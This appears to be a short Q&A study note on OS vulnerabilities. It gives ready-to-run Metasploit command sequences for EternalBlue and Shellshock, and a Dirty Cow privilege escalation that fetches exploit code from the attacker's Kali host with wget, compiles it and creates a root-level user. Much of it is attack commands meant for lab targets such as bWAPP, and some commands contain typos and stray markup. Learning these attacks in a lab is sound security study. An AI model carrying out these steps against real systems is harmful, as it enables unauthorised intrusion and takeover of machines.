Threat, Vulnerabilities and Mitigations: Operating System Vulnerabilities

Question 1

What are some of the operating systems exploits?

Answer 1

Windows OS
Linux

Question 2

Apart from the main OS used are other operating system safe?

Answer 2

No OS is safe. There are also numerous vulnerabilities for other operating systems, including the MacOS, iOS, Android, and embedded operating systems.

Question 3

What are some of the notable exploits of Windows OS?

Answer 3

DoublePulsar/EternalBlue: An older exploit, but there are some systems that might still be vulnerable to this attack. Here’s the code to exploit this, run from a terminal in Kali:

msfconsole

search eternalblue

use 0

set rhosts <targetIP></targetIP>

set lhosts <attackIP></attackIP>

Set target 0

run

Other exploits to note:

• BlueKeep
• PrintNightmare
• SMBGhost

Question 4

What are the notable exploits of Linux?

Answer 4

Shellshock: Here’s the code to exploit this, run from a terminal in Kali:

msfconsole

search shellshock

use 1

`set rhosts <bwapp_IP></bwapp_IP>

`set lhost <kali_IP></kali_IP>

set targeturi /bWAPP/cgi-bin/shellshock.sh

Run

Question 5

What does the linux exploit Dirty Cow?

Answer 5

Dirty Cow: Enables privilege escalation. Here’s the code to exploit this:

searchsploit dirty

cp /usr/share/exploitdb/exploits/linux/local/40839.c dirty.c

python3 -m http.server

Go back to bWAPP meterpreter shell

cd /tmp

wget http://<kali_IP>:8000/dirty.c</kali_IP>

gcc -pthread dirty.c -o dirty -lcrypt

./dirty password1

su firefart